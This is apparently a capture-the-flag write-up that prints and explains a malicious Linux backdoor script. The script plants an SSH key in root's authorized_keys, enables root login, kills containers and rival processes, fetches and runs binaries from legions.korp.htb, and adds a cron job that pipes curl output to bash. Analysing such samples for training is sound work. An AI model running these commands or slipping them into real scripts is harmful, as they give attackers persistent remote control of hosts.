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[Very Easy] It Has Begun

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It Has Begun

09th February 2024 / Document No. D24.102.XX

Prepared By: c4n0pus

Challenge Author(s): c4n0pus

Difficulty: Very Easy

Classification: Official


A very simple, very easy challenge that features a malicious backdoor sh script


  • The Fray is upon us, and the very first challenge has been released! Are you ready factions!? Considering this is just the beginning, if you cannot musted the teamwork needed this early, then your doom is likely inevitable

Skills Required

  • N/A

Skills Learned

  • Basic Linux scripting


We are given a single sh script file that contains various backdooring mechanisms.


if [ "$HOSTNAME" != "KORP-STATION-013" ]; then

if [ "$EUID" -ne 0 ]; then

docker kill $(docker ps -q)
docker rm $(docker ps -a -q)

echo "ssh-rsa AAAAB4NzaC1yc2EAAAADAQABAAABAQCl0kIN33IJISIufmqpqg54D7s4J0L7XV2kep0rNzgY1S1IdE8HDAf7z1ipBVuGTygGsq+x4yVnxveGshVP48YmicQHJMCIljmn6Po0RMC48qihm/9ytoEYtkKkeiTR02c6DyIcDnX3QdlSmEqPqSNRQ/XDgM7qIB/VpYtAhK/7DoE8pqdoFNBU5+JlqeWYpsMO+qkHugKA5U22wEGs8xG2XyyDtrBcw10xz+M7U8Vpt0tEadeV973tXNNNpUgYGIFEsrDEAjbMkEsUw+iQmXg37EusEFjCVjBySGH3F+EQtwin3YmxbB9HRMzOIzNnXwCFaYU5JjTNnzylUBp/XB6B user@tS_u0y_ll1w{BTH" >> /root/.ssh/authorized_keys
echo "nameserver" >> /etc/resolve.conf
echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
echo " legions.korp.htb" >> /etc/hosts

for filename in /proc/*; do
    ex=$(ls -latrh $filename 2> /dev/null|grep exe)
    if echo $ex |grep -q "/var/lib/postgresql/data/postgres\|atlas.x86\|dotsh\|/tmp/systemd-private-\|bin/sysinit\|.bin/xorg\|nine.x86\|data/pg_mem\|/var/lib/postgresql/data/.*/memory\|/var/tmp/.bin/systemd\|balder\|sys/systemd\|rtw88_pcied\|.bin/x\|httpd_watchdog\|/var/Sofia\|3caec218-ce42-42da-8f58-970b22d131e9\|/tmp/watchdog\|cpu_hu\|/tmp/Manager\|/tmp/manh\|/tmp/agettyd\|/var/tmp/java\|/var/lib/postgresql/data/pоstmaster\|/memfd\|/var/lib/postgresql/data/pgdata/pоstmaster\|/tmp/.metabase/metabasew"; then
        result=$(echo "$filename" | sed "s/\/proc\///")
        kill -9 $result
        echo found $filename $result

ARCH=$(uname -m)
array=("x86" "x86_64" "mips" "aarch64" "arm")

if [[ $(echo ${array[@]} | grep -o "$ARCH" | wc -w) -eq 0 ]]; then

cd /tmp || cd /var/ || cd /mnt || cd /root || cd etc/init.d  || cd /; wget http://legions.korp.htb/0xda4.0xda4.$ARCH; chmod 777 0xda4.0xda4.$ARCH; ./0xda4.0xda4.$ARCH; 
cd /tmp || cd /var/ || cd /mnt || cd /root || cd etc/init.d  || cd /; tftp legions.korp.htb -c get 0xda4.0xda4.$ARCH; cat 0xda4.0xda4.$ARCH > DVRHelper; chmod +x *; ./DVRHelper $ARCH; 
cd /tmp || cd /var/ || cd /mnt || cd /root || cd etc/init.d  || cd /; busybox wget http://legions.korp.htb/0xda4.0xda4.$ARCH; chmod 777;./0xda4.0xda4.$ARCH;
echo "*/5 * * * * root curl -s http://legions.korp.htb/0xda4.0xda4.$ARCH | bash -c 'NG5kX3kwdVJfR3IwdU5kISF9' " >> /etc/crontab

Firstly, it checks if the script has been run as root and if the hostname matches a specific one. Then it kills and removes any docker containers if found. After which, the script proceeds to backdoor the system using an ssh key and permits root logins.

The first part of the flag is in the ssh key, at the end where the user's email is:

echo "ssh-rsa AAA[REDACTED] user@tS_u0y_ll1w{BTH" >> /root/.ssh/authorized_keys

The script then proceeds to do some basic system enumeration and stop several processes. Finally, it enumerates the system architecture and downloads and executes a matching executable from the server.

After downloading it appends a line into /etc/crontab that will run another command every 5 minutes.

The second part of the flag is in the bash -c "NG5kX3kwdVJfR3IwdU5kISF9" part.

Base64 decoding the string will give us the flag!